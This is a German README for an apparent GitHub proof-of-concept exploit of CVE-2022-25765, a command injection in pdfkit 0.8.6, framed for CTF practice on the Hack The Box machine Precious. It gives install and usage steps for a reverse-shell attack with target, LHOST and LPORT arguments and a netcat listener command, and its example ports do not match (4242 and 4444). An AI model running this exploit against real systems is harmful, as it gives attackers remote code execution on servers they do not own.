
Python-PoC für CVE-2022-25765, eine Command-Injection-Schwachstelle in pdfkit, die Remote-Code-Ausführung über manipulierte PDF-Erstellung ermöglicht.
PoC für CVE-2022-25765, das verwundbare Versionen von pdfkit betrifft.
Getestet mit pdfkit 0.8.6.
requestscoloramaAbhängigkeiten installieren:
pip3 install -r requirements.txt
Oder manuell:
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
Beispiel: Einen Listener starten
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
Repository klonen:
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
Die Anforderungen installieren:
pip3 install -r requirements.txt
Führe den PoC gegen dein Laborziel aus.
CVE-2022-25765 ist eine Command-Injection-Schwachstelle in verwundbaren Versionen von pdfkit.
Das Problem hängt mit einer unzureichenden Bereinigung von benutzergesteuerten Eingaben zusammen, die an den PDF-Erzeugungsprozess übergeben werden.
Dieser PoC wurde hauptsächlich für Lernzwecke sowie für CTF-/Laborumgebungen erstellt.
Wenn du nach einem Ort suchst, um ihn auszuprobieren: Hack The Box : Maschine: Precious.
Verwende dies nur gegen Systeme, die dir gehören oder für die du eine ausdrückliche Testgenehmigung hast.
Ich bin nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Projekt verursacht werden.
INNOCENTx0